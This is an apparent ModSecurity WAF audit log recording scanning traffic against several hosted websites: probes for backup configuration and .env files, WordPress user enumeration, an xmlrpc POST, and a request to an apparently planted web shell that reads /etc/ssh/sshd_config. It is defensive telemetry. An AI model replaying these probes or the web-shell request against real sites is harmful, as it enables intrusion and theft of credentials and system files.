HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ecc8a844-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ecc8a844-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.orig"] [unique_id "aFBq4H8PxMRZ7s11niQKBQAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.orig' not found or unable to stat Stopwatch: 1750100704969088 4371 (- - -) Stopwatch2: 1750100704969088 4371; combined=2590, p1=521, p2=1995, p3=0, p4=0, p5=74, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ecc8a844-Z-- --34497735-A-- [17/Jun/2025:00:35:05.193407 +0530] aFBq4Sid3pHxA3RhGpzqWwAAAAk 185.177.72.201 46572 127.0.0.1 7080 --34497735-B-- GET /wp-config.php.swn HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --34497735-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --34497735-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.swn"] [unique_id "aFBq4Sid3pHxA3RhGpzqWwAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.swn' not found or unable to stat Stopwatch: 1750100705191115 2365 (- - -) Stopwatch2: 1750100705191115 2365; combined=1445, p1=326, p2=1054, p3=0, p4=0, p5=65, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34497735-Z-- --53f6f93d-A-- [17/Jun/2025:00:35:05.304793 +0530] aFBq4ZlL5_2Zd8wUdfLJNgAAAAg 185.177.72.201 46574 127.0.0.1 7080 --53f6f93d-B-- GET /web.config.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --53f6f93d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --53f6f93d-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.backup"] [unique_id "aFBq4ZlL5_2Zd8wUdfLJNgAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.backup"] [unique_id "aFBq4ZlL5_2Zd8wUdfLJNgAAAAg"] Stopwatch: 1750100705300867 4009 (- - -) Stopwatch2: 1750100705300867 4009; combined=2390, p1=548, p2=1718, p3=0, p4=0, p5=123, sr=140, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53f6f93d-Z-- --a4a8f554-A-- [17/Jun/2025:00:35:05.894068 +0530] aFBq4VJfblPUQiSn5r1hxQAAAAA 185.177.72.201 46648 127.0.0.1 7080 --a4a8f554-B-- GET /web.config.original HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a4a8f554-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a4a8f554-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.original"] [unique_id "aFBq4VJfblPUQiSn5r1hxQAAAAA"] Stopwatch: 1750100705890241 3901 (- - -) Stopwatch2: 1750100705890241 3901; combined=2298, p1=512, p2=1712, p3=0, p4=0, p5=74, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4a8f554-Z-- --4c27347d-A-- [17/Jun/2025:00:35:07.109016 +0530] aFBq4xwcFb_n1P0IC9xleAAAAAo 185.177.72.201 46804 127.0.0.1 7080 --4c27347d-B-- GET /web.config.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4c27347d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4c27347d-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.old"] [unique_id "aFBq4xwcFb_n1P0IC9xleAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.old"] [unique_id "aFBq4xwcFb_n1P0IC9xleAAAAAo"] Stopwatch: 1750100707105948 3133 (- - -) Stopwatch2: 1750100707105948 3133; combined=1911, p1=339, p2=1486, p3=0, p4=0, p5=86, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4c27347d-Z-- --de19be2e-A-- [17/Jun/2025:00:35:07.217392 +0530] aFBq45VkCcfT-Z8NQYyVBQAAAAc 185.177.72.201 46836 127.0.0.1 7080 --de19be2e-B-- GET /.htaccess.original HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --de19be2e-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --de19be2e-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.original"] [unique_id "aFBq45VkCcfT-Z8NQYyVBQAAAAc"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.original Stopwatch: 1750100707216310 1151 (- - -) Stopwatch2: 1750100707216310 1151; combined=547, p1=467, p2=0, p3=0, p4=0, p5=80, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de19be2e-Z-- --ecfcf874-A-- [17/Jun/2025:00:35:07.549935 +0530] aFBq45VkCcfT-Z8NQYyVBgAAAAc 185.177.72.201 46876 127.0.0.1 7080 --ecfcf874-B-- GET /index.html.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ecfcf874-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ecfcf874-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".html.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".html.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/index.html.bak"] [unique_id "aFBq45VkCcfT-Z8NQYyVBgAAAAc"] Stopwatch: 1750100707546513 3488 (- - -) Stopwatch2: 1750100707546513 3488; combined=2123, p1=367, p2=1687, p3=0, p4=0, p5=69, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ecfcf874-Z-- --c12e965e-A-- [17/Jun/2025:00:35:07.660140 +0530] aFBq45lL5_2Zd8wUdfLJPQAAAAg 185.177.72.201 46888 127.0.0.1 7080 --c12e965e-B-- GET /tests/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c12e965e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c12e965e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/tests/.env"] [unique_id "aFBq45lL5_2Zd8wUdfLJPQAAAAg"] Stopwatch: 1750100707657384 2810 (- - -) Stopwatch2: 1750100707657384 2810; combined=1609, p1=355, p2=1197, p3=0, p4=0, p5=57, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c12e965e-Z-- --d258ab04-A-- [17/Jun/2025:00:35:08.547189 +0530] aFBq5H3hoSwVUy254pH0aQAAACQ 185.177.72.201 47008 127.0.0.1 7080 --d258ab04-B-- GET /laravel/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d258ab04-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d258ab04-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/laravel/.env"] [unique_id "aFBq5H3hoSwVUy254pH0aQAAACQ"] Stopwatch: 1750100708544078 3165 (- - -) Stopwatch2: 1750100708544078 3165; combined=1801, p1=397, p2=1345, p3=0, p4=0, p5=59, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d258ab04-Z-- --e3bf3511-A-- [17/Jun/2025:00:35:08.767634 +0530] aFBq5BwcFb_n1P0IC9xlfQAAAAo 185.177.72.201 47044 127.0.0.1 7080 --e3bf3511-B-- GET /stylesheets/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e3bf3511-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e3bf3511-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/stylesheets/.env"] [unique_id "aFBq5BwcFb_n1P0IC9xlfQAAAAo"] Stopwatch: 1750100708764387 3302 (- - -) Stopwatch2: 1750100708764387 3302; combined=1921, p1=408, p2=1455, p3=0, p4=0, p5=58, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e3bf3511-Z-- --3c227956-A-- [17/Jun/2025:00:35:08.989006 +0530] aFBq5H8PxMRZ7s11niQKCwAAAAI 185.177.72.201 47074 127.0.0.1 7080 --3c227956-B-- GET /wp-config.php.tmp HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3c227956-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --3c227956-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.tmp"] [unique_id "aFBq5H8PxMRZ7s11niQKCwAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.tmp' not found or unable to stat Stopwatch: 1750100708985708 3357 (- - -) Stopwatch2: 1750100708985708 3357; combined=2018, p1=383, p2=1568, p3=0, p4=0, p5=67, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3c227956-Z-- --eabb782e-A-- [17/Jun/2025:00:35:09.548661 +0530] aFBq5X3hoSwVUy254pH0bAAAACQ 185.177.72.201 32834 127.0.0.1 7080 --eabb782e-B-- GET /admin.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --eabb782e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --eabb782e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/admin.php.old"] [unique_id "aFBq5X3hoSwVUy254pH0bAAAACQ"] Stopwatch: 1750100709544960 3756 (- - -) Stopwatch2: 1750100709544960 3756; combined=2230, p1=413, p2=1750, p3=0, p4=0, p5=66, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eabb782e-Z-- --87e6704e-A-- [17/Jun/2025:00:35:51.634336 +0530] aFBrDx6Azi2u_ik2Q3KpewAAAAY 216.73.216.71 42552 127.0.0.1 7081 --87e6704e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fssh&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fssh%2Fsshd_config HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --87e6704e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4439 Connection: close Content-Type: text/html; charset=UTF-8 --87e6704e-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:viewfile: /proc/self/root/etc/ssh/sshd_config"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:viewfile: /proc/self/root/etc/ssh/sshd_config"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrDx6Azi2u_ik2Q3KpewAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100751630296 4094 (- - -) Stopwatch2: 1750100751630296 4094; combined=2184, p1=346, p2=1712, p3=36, p4=35, p5=55, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87e6704e-Z-- --694b311e-A-- [17/Jun/2025:00:35:59.172940 +0530] aFBrFn3hoSwVUy254pH0qgAAACQ 34.68.37.79 43668 127.0.0.1 7081 --694b311e-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --694b311e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --694b311e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFBrFn3hoSwVUy254pH0qgAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100758472448 700586 (- - -) Stopwatch2: 1750100758472448 700586; combined=2051, p1=306, p2=1660, p3=0, p4=0, p5=84, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --694b311e-Z-- --301b2e59-A-- [17/Jun/2025:00:36:03.831124 +0530] aFBrGxwcFb_n1P0IC9xlxgAAAAo 34.68.37.79 37388 127.0.0.1 7081 --301b2e59-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --301b2e59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --301b2e59-H-- Message: 